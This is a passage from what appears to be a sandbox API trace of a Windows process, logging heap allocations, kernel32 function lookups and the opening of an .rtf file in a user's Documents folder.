hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.965] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.965] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.965] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0035.965] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cf10 [0035.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cf10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.966] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0035.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88cf10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.966] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.966] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.966] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0x935008 [0035.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", cchWideChar=78, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 78 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3688 [0035.967] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", cchWideChar=78, lpMultiByteStr=0x7f3688, cbMultiByte=78, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf", lpUsedDefaultChar=0x0) returned 78 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0035.967] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\xjufy.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0035.967] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.967] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0035.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=78, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 78 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x9c) returned 0x7d8558 [0035.968] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0x935008, cbMultiByte=78, lpWideCharStr=0x7d8558, cchWideChar=78 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\XjUfY.rtf") returned 78 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.968] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.968] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0035.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0035.969] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.969] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5b30 | out: hHeap=0x770000) returned 1 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0035.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0035.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0035.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0035.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0035.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0035.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.970] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0035.971] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0035.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0035.972] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0035.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.972] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 